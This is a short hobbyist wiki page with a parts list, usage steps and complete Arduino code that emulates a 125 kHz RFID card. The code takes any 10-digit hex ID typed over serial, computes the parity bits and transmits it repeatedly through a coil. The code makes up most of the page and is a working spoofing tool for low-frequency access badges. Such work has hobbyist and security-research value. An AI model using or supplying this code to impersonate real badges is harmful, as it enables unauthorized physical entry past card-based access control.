125Khz RFID spoofing
Versione del 7 apr 2019 alle 18:08 di Renzo (discussione | contributi)
The printable version is no longer supported and may have rendering errors. Please update your browser bookmarks and please use the default browser print function instead.
Circuit schematics
List of materials:
- an antenna (there are many 125khz antennas on e-bay)
- Capacitor 1nF (maybe this value must be tuned for the best resonance of the antenna)
- 4 diodes 1N4148
- Resistor 100Kohm
- zener diode 5.1v
Usage
Connect the two terminals of the circuit to GND and pin 12.
Compile and Load the code herebelow.
Open a serial terminal (9600 bit/s), e.g.
screen /dev/ttyUSB0 9600
Type in 10 hexadecimal digits (characters are not echoed). (the code computes all the parity bits, both horizontal and vertical).
Code
#define coil_pin 12 char data[10]; int data_count =0; int spoofed_card[64] = {1,1,1,1,1,1,1,1,1}; //header void setup() { pinMode(coil_pin, OUTPUT); digitalWrite(coil_pin, LOW); Serial.begin(9600); } void loop() { if(Serial.available()){ char key = Serial.read(); if(key != '\0') { data[data_count] = key; if(data_count == 9){ spoofcard(); data_count = 0; } else data_count ++; } } } void compute_data(){ // Compute raw data int data_iterator; int bit; int bit_set; for(bit = 0, data_iterator = 0; bit < 59; bit += 5, data_iterator++){ int raw_data = HexToDec(data[data_iterator]); spoofed_card[bit+9] = !! (raw_data & 8); spoofed_card[bit+10] = !! (raw_data & 4); spoofed_card[bit+11] = !! (raw_data & 2); spoofed_card[bit+12] = !! (raw_data & 1); } int i = 8; // CRC ROW for(int c = 3; c < 13; c++){ bit_set = 0; for(i++; i < ((c * 5) - 2); i++) if(spoofed_card[i]) bit_set++; spoofed_card[(c * 5)-2] = ((bit_set % 2) != 0); } // CRC COL for(int c = 0; c < 4; c++){ bit_set = 0; for(int a = 9; a < 55; a += 5){ if(spoofed_card[a + c]) bit_set++; } spoofed_card[c + 59] = ((bit_set % 2) != 0); } } void spoofcard(){ compute_data(); for(int h = 0; h < 50; h++) spoofnow(); } void send_manchester(int clock_half, int signal) { int man_encoded = clock_half ^ signal; if(man_encoded == 1) digitalWrite(coil_pin, LOW); else digitalWrite(coil_pin, HIGH); } void spoofnow(){ for(int i = 0; i < 64; i++) { send_manchester(0, spoofed_card[i]); delayMicroseconds(256); send_manchester(1, spoofed_card[i]); delayMicroseconds(256); } } int HexToDec(char hexa) { if (hexa >= '0' && hexa <= '9') return hexa - '0'; else if (hexa >= 'A' && hexa <= 'F') return hexa - 'A' + 10; else if (hexa >= 'a' && hexa <= 'f') return hexa - 'a' + 10; else return 0; }